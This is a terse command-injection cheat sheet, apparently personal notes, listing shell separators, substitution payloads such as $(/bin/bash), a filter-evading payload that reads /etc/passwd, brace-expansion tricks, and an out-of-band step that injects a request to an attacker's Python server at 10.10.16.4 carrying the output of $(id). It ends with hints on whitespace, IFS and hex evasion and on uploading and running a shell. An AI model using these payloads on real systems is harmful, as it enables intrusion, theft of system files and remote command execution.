command injection

some basic payloads

&
&&
|
||
;
;;

ADVANCE TECHNIQUES & PAYLOADS

$(command here)
$(/bin/bash)
google.com&&CMD=$'\x20/etc/passwd'&&cat$CMD
{cat,file.txt}
try to get ping using command injection >>

attacker : start python server on machine
victim   : http://10.10.16.4/

or
http://10.10.16.4/$(id)

try without whitespaces

try with IFS variable

try with hex value

shell upload & execute

Last updated